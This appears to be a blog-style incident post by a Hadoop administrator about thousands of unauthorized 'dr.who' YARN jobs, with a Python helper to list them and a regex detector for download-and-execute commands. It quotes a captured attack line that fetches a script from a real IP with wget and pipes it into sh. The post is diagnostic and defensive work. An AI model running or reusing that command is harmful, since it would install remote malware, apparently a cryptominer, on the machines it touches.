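Over the past few days the number of jobs on the cluster kept growing. None of them were submitted by our own workloads, every one of them eventually failed, and the submitting user was always "dr.who".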
Total number of applications (application-types: [] and states: [SUBMITTED, ACCEPTED, RUNNING]):6463
Application-Id Application-Name Application-Type User Queue State Final-State Progress Tracking-URL
application_1527846395871_0653 hadoop YARN dr.who default ACCEPTED UNDEFINED 0% N/A
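With thousands of entries like the one above, it helps to pull out the application IDs by user. The following is only a minimal sketch: it assumes the listing has been saved as text and that application names contain no whitespace (true for the row shown here, not guaranteed in general). The names `parse_app_list` and `ids_for_user` are made up for this illustration.

```python
SAMPLE = """\
Total number of applications (application-types: [] and states: [SUBMITTED, ACCEPTED, RUNNING]):6463
Application-Id Application-Name Application-Type User Queue State Final-State Progress Tracking-URL
application_1527846395871_0653 hadoop YARN dr.who default ACCEPTED UNDEFINED 0% N/A
"""


def parse_app_list(text):
    """Parse rows of a saved `yarn application -list` listing.

    Assumption: fields are separated by whitespace and no field
    (e.g. the application name) contains whitespace itself.
    """
    apps = []
    for line in text.splitlines():
        fields = line.split()
        # Data rows start with an application ID; this skips the
        # "Total number of applications" summary and the column header.
        if len(fields) < 6 or not fields[0].startswith("application_"):
            continue
        apps.append({
            "id": fields[0],
            "name": fields[1],
            "type": fields[2],
            "user": fields[3],
            "queue": fields[4],
            "state": fields[5],
        })
    return apps


def ids_for_user(text, user="dr.who"):
    """Return the application IDs submitted by the given user."""
    return [app["id"] for app in parse_app_list(text) if app["user"] == user]


if __name__ == "__main__":
    for app_id in ids_for_user(SAMPLE):
        print(app_id)
```

The resulting IDs could then be passed one at a time to `yarn application -kill`, although that only clears the queue and does nothing about whatever is submitting the jobs.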
Checking the logs:
The script timed out while the container was being initialized
exec /bin/bash -c "wget -q -O - 185.222.210.59/x_wcr.sh | sh & disown"
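A launch command that downloads a script and pipes it straight into a shell is a strong hint that the job is not legitimate. As a rough sketch, container logs can be scanned for this pattern as shown below. The regular expression and the function name `find_pipe_to_shell` are my own assumptions for illustration. They only cover `wget`/`curl` piped into `sh`/`bash`, so a miss here proves nothing.

```python
import re

# Matches "wget ..." or "curl ..." followed by an IPv4 address or an
# http(s) URL, then a pipe into sh or bash on the same line.
# Group 1 captures the IPv4 address or the URL.
PIPE_TO_SHELL = re.compile(
    r"\b(?:wget|curl)\b[^|\n]*?"
    r"((?:\d{1,3}\.){3}\d{1,3}|https?://\S+)"
    r"[^|\n]*\|\s*(?:sh|bash)\b"
)


def find_pipe_to_shell(log_text):
    """Return the remote sources of download-and-execute commands."""
    return PIPE_TO_SHELL.findall(log_text)


if __name__ == "__main__":
    line = 'exec /bin/bash -c "wget -q -O - 185.222.210.59/x_wcr.sh | sh & disown"'
    print(find_pipe_to_shell(line))
```

Run against the log line above, this reports the address the script was fetched from, which can then be checked against firewall or proxy logs.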
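I don't yet understand the exact mechanism, but I do know what triggered the problem: moving the ResourceManager from node1 to master. After moving it back to node1, the problem went away.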
------Update 2018.08.31, thanks to OrisonChan for the reply--------
#1 2018-08-18 22:41 | OrisonChan
https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html?childToView=210491#answer-210491
and
https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html